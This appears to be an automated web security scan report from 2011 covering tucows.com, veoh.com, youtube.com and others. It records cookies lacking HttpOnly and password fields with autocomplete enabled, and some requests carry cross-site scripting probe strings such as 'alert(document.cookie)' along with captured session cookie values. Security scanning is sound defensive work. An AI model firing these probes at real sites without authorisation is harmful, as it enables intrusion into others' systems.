GET /images/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/warningcow200.png HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:50:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 37121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 284258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wix.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=d302be2a HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/ck.php?oaparams=2__bannerid=1590__zoneid=64__OXLCA=1__cb=761e27d268__oadest=http%3A%2F%2Fwww.vipreantivirus.com%2Fspeed-matters.cfm%3Ftucows-ros-300x250 HTTP/1.1 Host: www8.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a; __utmc=163973946; __utmb=163973946;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/lg.php?bannerid=1441&campaignid=125&zoneid=8&loc=1&referer=http%3A%2F%2Fwww.tucows.com%2Fsoftware.html&cb=21d1a15d20 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
pw
Request
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <div id="signin" style="visibility: hidden;"> <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);"> <div class='bgBlue'> ...[SNIP]... <br /> <input type="password" name="pw" size="20" maxlength="20" value="" /> </p> ...[SNIP]...
The form contains the following password fields with autocomplete enabled:
pw
pwc
Request
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
The page contains a form with the following action URL:
https://author.tucows.com/index.php
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: author.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:52 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Connection: close Content-Type: text/html Content-Length: 13446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <ti ...[SNIP]... </script>
The page contains a form with the following action URL:
http://boardreader.com/my/subscription.html
The form contains the following password field with autocomplete enabled:
pass
Request
GET /my.html HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:23 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
The page contains a form with the following action URL:
https://bugzilla.mozilla.org/show_bug.cgi
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
